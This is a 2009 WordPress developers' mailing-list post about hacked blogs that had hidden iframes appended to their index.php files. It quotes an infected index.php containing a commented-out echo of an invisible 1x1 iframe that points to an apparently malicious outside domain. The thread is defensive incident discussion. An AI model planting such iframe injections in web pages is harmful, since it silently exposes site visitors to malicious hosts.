[wp-hackers] Hacked blogs
Peter van der Does
peter at avirtualhome.com
Thu Mar 26 16:25:41 GMT 2009
On Thu, 26 Mar 2009 13:56:27 +0100
Joost de Valk <joost at yoast.com> wrote:
> Harish Narayanan wrote:
> > Joost de Valk wrote:
> > >> Hey guys,
> >>
> >> I've been restoring 5 hacked blogs the last few days, all running
> >> 2.7.1 but spread over different hosts, can't find the hole yet
> >> that they're getting in through, but I'd thought I'd send out a
> >> warning to all of you that something seems to be wrong...
> >> >
> > Even if you aren't aware of the cause, could you point us to the
> > symptoms so we would know what to look for?
> >
> > Thanks,
> > Harish
> >
> > Sorry, should have included that immediately.
>
> Symptoms were, in all cases, iframes being added to the end of all
> index.php files in the blogs, in the footer. In some cases they were
> written with javascript, in other cases they were pure iframes.
>
> Best,
> Joost
A similar situation was reported on December 22, 2008 by madalin
[QOUTE]
Yes that's exactly what i am saying. Here is my index.php:
<?php
/**
* Front to the WordPress application. This file doesn't do anything,
but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define('WP_USE_THEMES', true);
/** Loads the WordPress Environment and Template */
require('./wp-blog-header.php');
// echo "<iframe src=\"http://thedeadpit.com/?click=17470781\" width=1
height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
?>
[/qoute]
The echo was commented out to keep for future reference according to the
OP.
No final verdict was given. The iframe was also found in non WordPress
related sites.
--
Peter van der Does
GPG key: E77E8E98
WordPress Plugin Developer
http://blog.avirtualhome.com
GetDeb Package Builder/GetDeb Site Coder
http://www.getdeb.net - Software you want for Ubuntu
More information about the wp-hackers
mailing list